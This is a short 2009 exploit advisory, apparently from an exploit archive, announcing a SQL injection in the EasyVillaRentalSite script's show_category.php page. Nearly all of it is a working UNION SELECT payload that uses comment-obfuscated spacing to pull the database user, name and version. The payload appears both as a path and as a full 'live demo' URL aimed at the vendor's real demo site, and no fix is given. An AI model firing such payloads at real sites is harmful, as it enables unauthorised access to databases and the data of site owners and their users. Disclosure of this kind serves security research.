EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability

2009-07-09 02:18:42

========================================================

==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

==> EmaiL : [email protected]

==> HomE : www.TrYaG.cc/cc

========================================================

==> Product Page :

==> http://easyvillarentalsite.com

==> ExplO!te :

==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--

==> L!ve D3mo :

==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--

=========================================================

==> GreeTz :

==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM

=========================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.